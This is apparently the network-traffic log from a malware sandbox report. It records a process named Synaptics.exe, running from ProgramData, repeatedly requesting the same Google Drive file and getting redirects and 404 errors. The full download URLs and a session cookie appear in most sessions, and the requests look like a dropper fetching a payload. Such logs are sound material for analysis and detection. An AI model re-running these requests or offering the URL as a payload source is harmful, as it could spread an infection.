                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="II67g99-sxAL1P7HCOqG5w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 49893 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EzetUvTvHiJHylEZPmqdtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 49898 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:37 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4KS1-8RPzB0Lv_c7iLtGFjZmcKJK3jBAYNptdA-urt_pRg2CNGOwwelOHjaa4LRS7W
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:37 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zQZnxz-jdoHytkoMnTSKRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:37 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:37 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 73 45 67 77 67 42 43 56 45 5f 7a 61 50 2d 62 37 30 42 74 6e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="QsEgwgBCVE_zaP-b70BtnQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:37 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 49899 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:37 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 03:59:37 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-vEm_S7qu6vMgkV9vCxj1Lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 49897 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:37 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 03:59:37 GMT
Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-FyvgMTGBGFSbJ1ZykSr4aQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 49900 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:37 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
X-GUploader-UploadID: AFiumC6ZyLoaYjCr-Jc-XrvFVN_QOa0zg5rYUjXF4yWWiBX3CVdzOKfd-BS-ozphNGTKaaAr
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 03:59:37 GMT
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-j_HjNlZEvZlwl8B9WK6kXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Cross-Origin-Opener-Policy: same-origin
Content-Length: 1652
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Content-Security-Policy: sandbox allow-scripts
Connection: close
2024-12-30 03:59:37 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:37 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="sgwehUjAQRfKN76TwagApg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:37 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 49901 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive
Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    106192.168.2.449903142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:38 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-AOy3fz3EjZp7s8mpR0BtVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    107 | 192.168.2.4 | 49902 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:38 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:38 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:38 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fVswUydJgVCusezwL-QIWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    108 | 192.168.2.4 | 49904 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:38 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    109 | 192.168.2.4 | 49906 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-IyNXfqBUL7FBKaAD6SvpSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    110 | 192.168.2.4 | 49907 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
